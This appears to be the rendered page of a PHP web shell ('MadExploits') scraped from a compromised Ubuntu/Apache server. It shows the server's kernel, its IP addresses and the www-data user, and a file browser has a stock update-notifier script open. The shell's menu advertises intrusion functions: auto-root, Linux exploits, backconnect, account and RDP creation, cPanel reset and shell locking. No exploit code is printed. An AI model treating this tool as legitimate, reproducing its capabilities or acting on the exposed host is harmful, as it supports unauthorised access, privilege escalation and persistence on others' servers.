Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.253.118
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
update-notifier /
[ HOME SHELL ]
Name
Size
Permission
Action
plugins
[ DIR ]
drwxr-xr-x
upgrader-patches
[ DIR ]
drwxr-xr-x
notify-reboot-required
751
B
-rwxr-xr-x
notify-updates-outdated
519
B
-rwxr-xr-x
package-data-downloads-failed
27.94
KB
-rw-r--r--
package-data-downloads-failed-...
32.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notify-updates-outdated
#!/bin/sh # we do not include ". gettext.sh" here because: # a) it breaks if its not available # b) the string we have here does not need it (because it has no vars) eval_gettext() { if [ -x /usr/bin/gettext ]; then echo $(gettext "$1") else echo "$1" fi } export TEXTDOMAIN=update-notifier export TEXTDOMAINDIR=/usr/share/locale # Print the message echo "" eval_gettext "The list of available updates is more than a week old." eval_gettext "To check for new updates run: sudo apt update"
Close